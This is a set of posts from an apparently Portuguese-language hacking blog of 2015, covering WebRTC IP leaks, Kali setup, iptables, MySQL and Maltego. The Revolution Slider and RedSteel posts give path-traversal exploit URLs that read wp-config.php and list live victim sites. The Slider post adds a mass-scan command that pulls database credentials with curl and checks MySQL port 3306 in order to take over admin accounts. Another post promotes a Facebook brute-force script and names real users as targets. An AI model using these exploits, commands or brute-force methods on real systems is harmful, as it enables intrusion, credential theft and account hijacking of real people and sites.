quinta-feira, 26 de fevereiro de 2015

WeRTC Javascript Bypass Tor vpn


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que sites podem ter acesso facilmente a seus endereços de IP através WebRTC.

A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.

Revelações feitas pelo Snowden, deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós vimos que o Governo canadense rastreia visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionado.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas possam verificar se são afetados pela falha de segurança.

DEMO: github.com/diafygi/webrtc-ips
TESTE AQUI: diafygi.github.io/webrtc-ips

Tutorial Completo Aqui
 
Read More

Wordpress Revolution Slider Local File Disclosure

Wordpress Revolution Slider Local File Disclosure
Nesse tutorial mostro como vocês pode obter dados do mysql dos servidores vulneravel, ("E-Commerce") usando a google inurlbr para fazer as busca e deixando tudo organizado no bloco de notas, tambem fazendo uma verificação na posta do servidor, a porta 3306 a qual usaremos para nos conectar nor servidor, e assim tendo acesso a tabela de usuarios do wordpress, podendo fazer update da senha e colocando a nossa e assim logamos no painel.
[+] Titulo: Wordpress slider reolusion local file download
[+] Data: 25-01-2015
[+] Author: JOK3R
[+] Site Vendedor: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Testado em: windows 7 / firefox , kali linux / firefox
[+] Arquivos Vulneravel: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/
POC:
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Demo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
Creditos:
Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And All iranian Hacker's And Exploiter's <3
[+] iran-cyber.in 
Sobre SCANNER - INURLBR
GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
SCRIPT NAME: INURLBR
AUTOR: Cleiton Pinheiro
Nick: Googleinurl
Blog: http://blog.inurl.com.br
twitter: /@googleinurl
facebook: /InurlBrasil Download: Script
Outras  Informações
Na Busca vamos usar a "Google InurlBR" que faz toda a busca de forma rapida e facil. Junto como o comando do NMAP, para verificar a porta 3306 se está aberta. (OBS, "Não significa a porta esteja aberta que você consiga entrar no MYSQL. Algums Servidores, devem está configurado para não acessa remotamente o servidor do MYSQL")

Busca Avançada com InurlBr + Nmap
Mude aqui para outros dominios em = site:br, site:com, site:uk... etc
Crie um pasta na sua area de trabalho com o nome  " output " ou remova o caminho

Comando InurlBR
root@kali:~# php inurlbr.php --dork '"Index of" /wp-content/plugins/revolution-slider site:br' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php' --comand-vul 'nmap -Pn -p 3306 _TARGET_' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
Video:

Wordpress_Revolution_Slider_Local_File_Disclosure - ECommerce from Mathew Thomas on Vimeo.

https://youtu.be/5rvOuPGLwuk?t=4m48s
Read More

quarta-feira, 25 de fevereiro de 2015

Como instalar o KaliLinux na Virtualbox com Whonix gateway UPADATE

UPDATE
Como instalar o KaliLinux na Virtualbox com Whonix gateway

Antes que possamos começar, certifique-se de fazer o download dos componentes necessários.

Downloads:
Virtualbox: https://www.virtualbox.org/wiki/Downloads
Para o Linux (Ubuntu/Debian) os usuários digite:
step 1: sudo apt-get install linux-headers-$(uname -r)
step 2: sudo apt-get update && sudo apt-get install virtualbox
ou fazer download nesse link: https://www.virtualbox.org/wiki/Linux_Downloads -> All distributions  i386 or  AMD64

Whonix Gateway:

2 Click em novo ou new, nao sei como ta seu idioma, no meu caso ér new mesmo, dou prefencia por meu OS instalação em ingles
3 Digite o nome desejado: Kali Linux, Tipo: Linux, Versão: Debian (se você está instalando a versão de 64 bits, por favor, selecione "Debian (64 bits)") e clique em Avançar ou Next.
4 Escolha a quantidade de memoria RAM que deve ser usado. Eu recomendo 1512MB. Avançar ou Next.
5 Basta clicar em Criarou Create.
6 Selecione VDI (VirtualBox Imagem de Disco) e clique novamente em Avançar ou Next.
7 Apenas clique em Avançar ou Next.
8 Mude o disco para 25 GB e clique em Criar ou Create
9 Clique em Sistema e certifique-se de relógio de hardware em tempo UTC é selecionado.
10 Clique na guia Processador ou Processor e certifique-se de Habilitar PAE/NX é marcado (se disponível).
11 Click em Rede ou Network.
 12 Clique no Attached to: (NAT) e selecione Rede Interna ou Internal Network.
13 Certifique-se de Whonix é selecionado. e clique em OK.
14 Click em Armazenamento ou Storage.
15 Selecione vazio, o símbolo de CD/DVD, e escolher um arquivo de disco de CD/DVD virtuais ... Navegue até a achar a imagem ISO do kali-linux e selecioná-lo. Clique em OK
16 Selecione USB e desmarque Habilitar controlador USB ou Enable USB Controller.
17 Click em Iniciar ou Start.
18 Selecione instalar modo gráfico ou Graphical install e aperte enter.
19 Selecione em Inglês ou o idioma desejado (tutorial está em Inglês). Clique em Continuar.
20 Selecione a sua localização. Clique em Continuar.
21 Configure o teclado (selecione o seu de teclado Brazilian) e clique em Continuar. Agora, a instalação começara e configuração auto da rede irá aparecer falhar na auto configuração. tudo bem. Clique em Continuar.

22 Seleccione Configurar rede manualmente e clique em Continuar.
23 Digite o endereço IP: 192.168.0.20/24 e clique em Continuar.
24 Digite 192.168.0.10 IP do Gateway e clique em Continuar.
25 O endereço do nome do servidor é  192.168.0.10 ... clique em Continuar.
26 Escolheu o nome do host NOME DO COMPUTADOR (para o tutorial eu estou bem com kali). Clique em Continuar.
27 Nome de domínio: Basta deixá-lo em branco e clique em Continuar.
28 Digite a senha do usuario root e digitá-lo novamente. Clique em Continuar.
29 Selecione o seu fuso horário. IMPORTANTE! Não use a sua verdadeira localização/fuso horário.
30 Método de particionamento: Faça como quiser. (para este tutorial eu uso - usar o disco inteiro). Clique em Continuar.
Ver mais em: aqui
31 Basta clicar em Continuar.
32 Basta clicar em Continuar. (Todos os arquivos em uma partição)
33 Basta clicar em Continuar. (Terminar particionamento e escrever as alterações no disco)
34 Selecione Sim e clique em Continuar.
35 Agora é a hora para o café/cerveja ou qualquer outra coisa!! :) Prefiro cerveja. se vc ér demenor vá comer sucrilos com leite depois tome um Activia, sei la, foda-se
36 Basta clicar em Continue (Use um espelho de rede?/Use a network mirror? = Não/No)
37 Instalar o GRUB boot ... Sim e clique em Continuar.
38 Instalação concluída. Clique em Continuar, Instalação terminará eo sistema irá reiniciar (que pode demorar alguns minutos.)

Ok. Agora você tem Kali Linux instalado através do Whonix Gateway.

Se você quiser instalar o VirtualBox Guest Additions por favor certifique-se de ler este primeiro. Aqui $$ Aqui

Lembre-se. Não é 100% provar de bala e pode ser rastreada. Para mais privacidade/anonimato ler Aqui

Bem, não foi tão difícil e eu espero que você goste.

UPADATE IPS
root@kali:~# cat /etc/network/interfaces
# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 
# The loopback network interface
auto lo
iface lo inet loopback 
# The primary network interface
allow-hotplug eth0
iface eth0 inet static 
#----------------Whonix-Gateway---------------------------------------------
 address 10.152.152.50
 netmask 255.255.255.0 
 network 10.152.152.0 
 broadcast 10.152.152.255
 gateway 10.152.152.10 
# dns-* options are implemented by the resolvconf package, if installed 
 dns-nameservers 10.152.152.10 


root@kali:~# cat /etc/resolv.conf
nameserver 10.152.152.10

Read More

sábado, 21 de fevereiro de 2015

Wordpress Redsteel Theme File Disclosure

Wordpress Redsteel Theme File Disclosure

[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date : Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By : ACC3SS

Location:
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php

Vulnerable code file : download.php

<?php
$file = @$_GET['file'];
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
if ((isset($file))&&(file_exists($file))) {
  header("Content-type: application/force-download");
  header('Content-Disposition: inline; filename="' . $fileName . '"');
  header("Content-Transfer-Encoding: Binary");
  header("Content-length: ".filesize($file));
  header('Content-Type: application/octet-stream');
  header('Content-Disposition: attachment; filename="' . $fileName . '"');
  readfile($file);
}
?>

Proof:
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php


lllllllllllllllllllldjjjjjjjjjjjjjjjjj







Read More

quinta-feira, 19 de fevereiro de 2015

Script em Python para Brute Force em Facebook

Script em python, para brute force em contas de facebook, para você ter sucesso na quebra, você deve criar uma boa lista de senhas.

Esta ferramenta pode quebrar contas de facebook, mesmo se você não tem o e-mail de sua vitima
Use www.graph.facebook.com/nome_vitima para mais infos sobre sua vitima
Exemplo1:
http://graph.facebook.com/yasmin.moratti7
{
   "id": "100003076495801",
   "first_name": "Yasmin",
   "gender": "female",
   "last_name": "Moratti",
   "locale": "pt_BR",
   "name": "Yasmin Moratti",
   "username": "yasmin.moratti7"
}
Exemplo2:
http://graph.facebook.com/oliveirarayssa123 
{
   "id": "100003629418208",
   "first_name": "Anna",
   "gender": "female",
   "last_name": "Rayssa",
   "link": "https://www.facebook.com/oliveirarayssa123",
   "locale": "pt_BR",
   "name": "Anna Rayssa",
   "username": "oliveirarayssa123"
}

"Cracker Facebook Version 2 pode quebrar  banco de dados  em Facebook 100% sem interrupção pelo Firewall do Facebook !
Esta Programa é apenas para fins educacionais.

Não use sem que a pessoa saiba isso é ilegal!
Se você quer quebrar a conta de alguém, você deve ter a permissão do usuário.

O Autor e eu, não somos responsável pelo o mau uso da ferramenta.
Apenas compartinhando conhecimentos"

INSTRUÇÃO
Passo 1
# apt-get install python-mechanize

Passo 2
# python facebook-pt-br.py

Download Ferramentas:
Português: Aqui
Inglês: Aqui

Video Tutorial:
Autor Video: Limon Tec
Blogger: Limon Tec


Look here:
Anna Rayssa





Read More

sábado, 14 de fevereiro de 2015

Iptables Básico

O Firewall é um programa que como objetivo proteger a máquina contra acessos indesejados, tráfego indesejado, proteger serviços que estejam rodando na máquina e bloquear a passagem de coisas que você não deseja receber (como conexões vindas da Internet para sua segura rede local, evitando acesso aos dados corporativos de uma empresa ou a seus dados pessoais). No kernel do Linux 2.4, foi introduzido o firewall iptables (também chamado de netfilter) que substitui o ipchains dos kernels da série 2.2. Este novo firewall tem como vantagem ser muito estável (assim como o ipchains e ipfwadm), confiável, permitir muita flexibilidade na programação de regras pelo administrador do sistema, mais opções disponíveis ao administrador para controle de tráfego, controle independente do tráfego da rede local/entre redes/interfaces devido a nova organização das etapas de roteamento de pacotes.
O iptables é um firewall em nível de pacotes e funciona baseado no endereço/porta de origem/destino do pacote, prioridade, etc. Ele funciona através da comparação de regras para saber se um pacote tem ou não permissão para passar. Em firewalls mais restritivos, o pacote é bloqueado e registrado para que o administrador do sistema tenha conhecimento sobre o que está acontecendo em seu sistema.
Ele também pode ser usado para modificar e monitorar o tráfego da rede, fazer NAT (masquerading, source nat, destination nat), redirecionamento de pacotes, marcação de pacotes, modificar a prioridade de pacotes que chegam/saem do seu sistema, contagem de bytes, dividir tráfego entre máquinas, criar proteções anti-spoofing, contra syn flood, DoS, etc. O tráfego vindo de máquinas desconhecidas da rede pode também ser bloqueado/registrado através do uso de simples regras. As possibilidades oferecidas pelos recursos de filtragem iptables como todas as ferramentas UNIX maduras dependem de sua imaginação, pois ele garante uma grande flexibilidade na manipulação das regras de acesso ao sistema, precisando apenas conhecer quais interfaces o sistema possui, o que deseja bloquear, o que tem acesso garantido, quais serviços devem estar acessíveis para cada rede, e iniciar a construção de seu firewall. O iptables ainda tem a vantagem de ser modularizável, funções podem ser adicionadas ao firewall ampliando as possibilidades oferecidas.
Um firewall não funciona de forma automática (instalando e esperar que ele faça as coisas por você), é necessário pelo menos conhecimentos básicos de rede tcp/ip, roteamento e portas para criar as regras que farão a segurança de seu sistema. A segurança do sistema depende do controle das regras que serão criadas por você, as falhas humanas são garantia de mais de 95% de sucesso nas invasões.
Enfim o iptables é um firewall que agradará tanto a pessoas que desejam uma segurança básica em seu sistema, quando administradores de grandes redes que querem ter um controle minucioso sobre o tráfego que passam entre suas interfaces de rede (controlando tudo o que pode passar de uma rede a outra), controlar o uso de tráfego, monitoração, etc.
Fonte: guiafoca.org
O Linux utiliza um recurso independente em termos de kernel para controlar e monitorar todo o tipo de fluxo de dados dentro de sua estrutura operacional. Mas não o faz sozinho, pois sua função deve ser a de trabalhar ao lado de processos e tarefas tão somente.
Para que o kernel pudesse então controlar seu próprio fluxo interno lhe fora agregada uma ferramenta batizada de netfilter.
Criado por Marc Boucher, James Morris, Harald Welte e Rusty Russell, o netfilter é m conjunto de situações de fluxo de dados agregadas inicialmente ao kernel do Linux e dividido em tabelas.
Sob uma ótica mais pratica podemos ver o netfilter como um grande bando de dados que contem em sua estrutura 3 tabelas padrões: Filter, Nat e Mangle. Cada uma destas tabelas contem regras direcionadas a seus objetivos básicos. A tabela filter por exemplo guarda todas as regras aplicadas a um firewall filtro de pacotes, a tabela Nat das regras direcionadas a um Firewall Nat e a Mangle a funções mais complexas de tratamento de pacotes como o TOS.
Todas as tabelas possuem situações de fluxo (entrada, saída, redirecionamento, etc.) que lhes proporcionam a realização de seus objetivos.

Tabela Filter
 É a tabela padrão do Netfilter e trata das situações implementadas por um Firewall filtro de pacotes. Estas situações são:
INPUT
Tudo o que entra no host.
FORWARD
Tudo o que chega ao host mas deve ser redirecionado a um host secundário ou outra interface de rede.
OUTPUT
Tudo o que sai do host.
Tabela NAT
Esta tabela implementa funções de NAT (Networ Address Translation) ao host Firewall. O Nat por sua vez, possui diversas utilidades, conforme abordado anteriormente. Suas situações são:
PREROUTING
Utilizada quando há necessidade de se fazer alterações em pacotes antes mesmo que sejam roteados.
OUTPUT
Trata os pacotes emitidos pelo host Firewall.
POSTROUTING
Utilizado quando há necessidade de se fazer alterações em pacotes após o tratamento de roteamento.
Tabela Mangle
Implementa alterações especiais em pacotes em um nível mais complexo. A tabela Mangle é capaz por exemplo de alterar a prioridade de entrada e saída de um pacote baseado no tipo de serviço (TOS) o qual o pacote se destinava, Suas situações são:
PREROUTING
Modifica pacotes dando-lhes em tratamento especial antes que os mesmos sejam roteados.
OUTPUT
Altera pacotes de forma especial gerados localmente antes que os mesmos sejam roteados.
AS prioridades são:
Espera mínima                                 16 ou 0x10
Maximo processamento                     8 ou 0x08
Máxima confiança                              4 ou 0x04
Custo mínimo                                    2 ou 0x02
Prioridade normal                              0 ou 0x00
Parâmetros
-A = Adiciona uma nova entrada ao fim da lista de regras.
-D = Apaga um regra especificada da lista.
-L = Lista as regras existentes na lista.
-P = Altera a política padrão das chains.
-F = Remove todas as entradas adicionadas na lista.
-I = Insere uma nova regra ao inicio da lista de regras.
-R = Substitui uma regra já adicionada.
-N = Cria uma nova chain a tabela especificada.
-E = Renomeia uma chain criada anteriormente.
-X = Apaga uma chain.
-p =Especifica o protocolo aplicado a regra, pode ser qualquer valor numérico especificado no arquivo /etc/protocol ou o próprio nome do protocolo (tcp, udp, icmp, etc...).
-i = Especifica a interface de entrada a ser utilizada.
-o = Especifica a interface de saída a ser utilizada.
-s = Especifica a origem (source) do pacote ao qual a regra deve ser aplicada.
-d = Especifica o destino do pacote (destination) ao qual a regra deve ser aplicada.
! = Significa exclusão e é utilizada quando se deseja aplicar uma exceção a uma regra.
-j = Define o alvo (target) do pacote caso o mesmo se encaixe a uma regra.
--sport = Porta de origem.
--dport = Porta de destino.
ACCEPT = Aceita a passagem do pacote.
DROP = Descarta o pacote.
REJECT = Rejeita o pacote.
LOG = Cria uma entrada de log no arquivo /var/log/messages
RETURN = Retorna o processamento do chain anterior sem processar o resto do chain atual.
QUEUE = Encarrega um pograma em nível de usuário de administrar o processamento de fluxo atribuído ao mesmo.
SNAT = Altera a origem das maquinas clientes antes dos pacotes serem roteados.
DNAT = Altera o destino das maquinas clientes.
REDIRECT = Realiza o redirecionamento de portas.
TOS = Prioriza a entrada e saída de pacotes baseados em seu tipo de serviço.
Exemplos
Lista as regras na lista da tabela Filter.
# iptables -L
Lista as regras na lista da tabela Nat.
# iptables -t nat -L
Lista as regras na lista da tabela Mangle.
# iptables -t mangle -L
Define a política padrão DROP da da chain INPUT.
# iptables -P INPUT DROP
Define a política padrão DROP da da chain OUTPUT.
# iptables -P OUTPUT DROP
Define a política padrão DROP da da chain FORWARD.
# iptables -P FORWARD  DROP
Libera o trafego na interface de loopback
# iptables -A INPUT -i lo -j ACCEPT
Proibe a rede 192.168.0.0/24 acessar o dominio sex.com.br
# iptables -A FORWARD -s 192.168.0.0/24 -d www.sex.com.br -j DROP
Rejeita pacotes vindos do ip 200.200.100.44 para a rede 192.168.0.0/24.
# iptables -A FORWARD -s 200.200.100.44 -d 192.168.0.0/24 -j REJECT
Redireciona os pacotes com destino a porta 3389 do protocolo tcp para o ip 10.0.0.5
# iptables -t nat -A PREROUTING -p tcp --dport 3389 -j DNAT --to 10.0.0.5:3389
Aceita a saida de pacotes de todas as interfaces exceto da eth3.
# iptables -A OUTPUT -i ! eth3 -j ACCEPT
Deleta a regra inserida anteriormente
# iptables -D OUTPUT -i ! eth3 -j ACCEPT
Aceita pacotes tcp com porta origem entre a 1024 até a 65535 com destino ao ip 10.0.10.5 na porta 80.
# iptables -A FORWARD -p tcp --sport 1024:65535 -d 10.0.10.5 --dport 80 -j ACCEPT
Configura o proxy transparente caso o proxy esteja rodando no mesmo host do firewall, a regra redireciona todo pacote com destino a porta 80 para a porta 3128.
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
Apaga todas as regras na chain INPUT
# iptables -F INPUT
Insere a regra no topo da lista, bloqueia o pacote que sair pela interface eth0 com destino a porta 3777.
# iptables -I OUTPUT -o eth0 --dport 3777 -j DROP
Cria a chain INTERNET na tabela filter
# iptables -t filter -N INTERNET
Renomeia a chain INTERNET para NET
# iptables -E INTERNET NET
Apaga a chain NET
# iptables -X NET
Loga acessos na porta 22
# iptables -A INPUT -p tcp --dport 22 -j LOG --log-prefix "ACESSO A PORTA 22"
Define espera minima para pacotes que entrarem no host com porta origem 22
# iptables -t mangle -A PREROUTING -p tcp --sport 22 -j TOS --set-tos 16
Fonte: Abrir
Read More

Comandos básicos MYSQL

Olá criaturas virtuais, Nessa post ire mostra alguns comando básicos do  MYSQL

Acessando banco como root
root@kali:~# mysql -h localhost -u root 
Inserindo uma senha
mysql> set password for root@localhost = password('abc12345');
Criando um banco
mysql> create DATABASE extras;
Usando o Banco
mysql> use extras;
Criando uma Tabela
mysql> create TABLE users (
    -> id int(11) NOT NULL AUTO_INCREMENT,
    -> name varchar(100) NOT NULL,
    -> address varchar(100) NOT NULL,
    -> phone varchar(50) NOT NULL,
    -> login varchar(100) NOT NULL,
    -> passwd varchar(100) NOT NULL,
    -> PRIMARY KEY (id)
    -> );
Mostrar Tabelas
mysql> show tables;
Mostrar Colunas de uma determinada Tabela
mysql> DESC users;
Inserir uma coluna em uma tabela
mysql> ALTER TABLE users ADD ip varchar(25);
Modificar definições de uma coluna
mysql> ALTER TABLE users MODIFY ip varchar(50);
Excluir coluna da tabela
mysql> ALTER TABLE users DROP phone;
Renomear uma tabela
mysql> ALTER TABLE users RENAME usuarios;
Deleta uma tabela
mysql> DROP TABLE noticias;
Inserir dados na tabela

mysql> INSERT INTO `usuarios` (`id`, `name`, `address`, `login`, `passwd`, `ip`) VALUES ('1', 'Marcos da Silva', 'Rua da sexta', 'markim123', 'admin1234', '192.168.1.1');
Update de uma determinada coluna
mysql> UPDATE `extras`.`usuarios` SET `passwd`='addmim123456' WHERE `usuarios`.`ID`=1;
Deleta uma base de bados
mysql> DROP DATABASE test;

Comandos Extras
Logando no servidor Remoto
root@kali:~# mysql --host mysql.url.com.br --user val--password='v234'
Dump de uma tabela salvando .sql
root@kali:~# mysqldump -h mysql.url.com.br -u USER -pSENHA --opt DATABSENAME TABLENAME > ~/desktop/backup.sql
Dump de uma tabela salvando .csv
root@kali:~# mysql -h mysql.url.com.br -u username -ppassword -e "SELECT * from TABLENAME" DATBASENAME | sed 's/\t/","/g;s/^/"/;s/$/"/' > filename.csv









Read More

Maltego - Enumeracãoo de informacoes INTRO

Bom Pessoal, Nesse post irei falar sobre o Maltego.



Maltego é um software usado para obter informaçẽs, serviços e forense de código aberto , desenvolvido pela Paterva. Maltego se concentra em fornecer uma biblioteca de transformações para a descoberta de dados de fontes abertas, e visualizar as informações em um formato gráfico, adequado para análise de ligação e de mineração de dados.

Maltego cria Autorizações de entidades personalizadas, permitindo que ele  represente qualquer tipo de informação, além dos tipos de entidades de base que fazem parte do software. O foco básico da aplicação está na analise e as relações do mundo real entre pessoas, grupos, sites, domínios, redes, infra-estrutura de internet, e afiliações com serviços online como o Twitter e Facebook.

Escrito em     Java
Plataforma     Linux , Mac OS X , o Windows

Em um precedimento de pentest em fases de levantamento das informações é uma fase primordial para um bom sucesso do serviço, a finalidade dessa fase é descobrir o máximo de informações sobre o alvo, facilitando as outras fases seguintes de exploração de vulnerabilidades e invasão final.

Bom pessoal neste post nao ire aborda o funcionamento da ferramenta mais apenas os primeiros acessos e cadastro de conta.

Bom ela ja vem nos padrões do kali linux em top 10 ferramentas, Então Vamos Iniciar a ferramenta.

Abra um terminal e digite:
$ maltego (Ira iniciar a ferramenta)

Logo apos a inicialização da ferramenta pela primeira vez, iremos fazer nosso primeiro cadatro, rapido e facil nescessitando apenas de um email valido.
Click em Proximo.
Agora Click em registre here, ira abrir o navegado contendo o link de inscrição
Agora prencha com todas as informaçoes nesessaria:
e em seguida registro, uma mensagemm abrir dizendo pra verificar no seu email: Abra na sua caixa de entrada, caso nao esteja olhe em spam
Abra o email e click no link de confimação, abrira um novo link de ativação.
Agora ja com o registro concluido e ativado, va ate o maltego e insirar seu email e senha de cadatro e os capcht
proximo, uma mensagem mostra que o login foi efetuado com sucesso.
Poxima tela click em cancelar. Pronto primiros passos concluído

Ate a proxima



























Read More

How to Install Google Chrome in Kali Linux


Google Chrome é um navegador web desenvolvido pelo Google. É utilizado o mecanismo de layout WebKit até a versão 27 e, com exceção de seus iOS releases, a partir da versão 28 e além usa o Blink WebKit garfo. Foi lançado como uma versão beta para o Microsoft Windows, em 2 de setembro de 2008, e como um lançamento público estável, em 11 de dezembro, 2008.

Net Applications indicou que o Chrome é o navegador web é o terceiro mais popular quando se trata do tamanho de sua base de usuários, atrás do Internet Explorer e Firefox.

Em setembro de 2008, o Google lançou a maiorias do código-fonte do Chrome como um projeto open source chamado Chromium, em que libera Chrome ainda são baseadas. Notáveis componentes que não são de código aberto são o visualizador de PDF embutido e o play built-in do Flash.

Chromium está disponível gratuitamente nos repositórios Kali. No entanto Google Chrome não é. Há algumas maneiras diferentes de instalar e executar o Google Chrome no Kali Linux.
Fonte


Instalando o Google Chrome no Kali Linux

Duas maneiras que você pode instalar o Google Chrome:

1 - Baixando o pacote do Google .deb
2 - Adicionar o Google Chrome no Repositories (estamos ignorando Repositório Debian)

Há muitos lugares disponíveis em resultado de pesquisa sobre como adicionar repositórios do Debian e instalar o Google Chrome no Kali Linux.

1 - Mode

1.1 Abra seu terminal e digite:
$ wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 
Isso irá baixar o google-chrome para o seu compuatdor

1.2 Agora Digite:
$ chmod +x google-chrome-stable_current_amd64.deb
Iso irá da permições totais

1.3 Agora iniciando a instalação, Digite:
$ dpkg -i google-chrome-stable_current_amd64.deb
Isso ira iniciar a instalação e suas configurações no seu kali

"QUANDO TUDO TERMINA VOCÊ IRA INICIAR O SEU CHROME, ELE MOSTRARÁ UM ERROR, FALANDO Q O CHROME DEVE SER INICIADO POR UM USUARIO NORMAL, POIS NAO É ACEITO INICIAR EM MODO ROOT, ENTÃO IREMOS CORRIIR ADIANTE"

1.4 Agora vamos corrigir o error, Digite:
$ nano /opt/google/chrome/google-chrome
E vá até a ultima linha, procure o comentario; # Note: exec -a below is a bashism. Apague as duas ultimas linhas abaixo desse comentario
e cole essa: exec -a "$0" "$HERE/chrome" "@" --user-data-dir, fincado o resultado final assim:
# overrides the default.
if [[ -n "$CHROME_USER_DATA_DIR" ]]; then
  PROFILE_DIRECTORY_FLAG="--user-data-dir=$CHROME_USER_DATA_DIR"
fi

# Sanitize std{in,out,err} because they'll be shared with untrusted child
# processes (http://crbug.com/376567).
exec < /dev/null
exec > >(exec cat)
exec 2> >(exec cat >&2)

# Note: exec -a below is a bashism.
exec -a "$0" "$HERE/chrome" "@" --user-data-dir

Video aqui:




Read More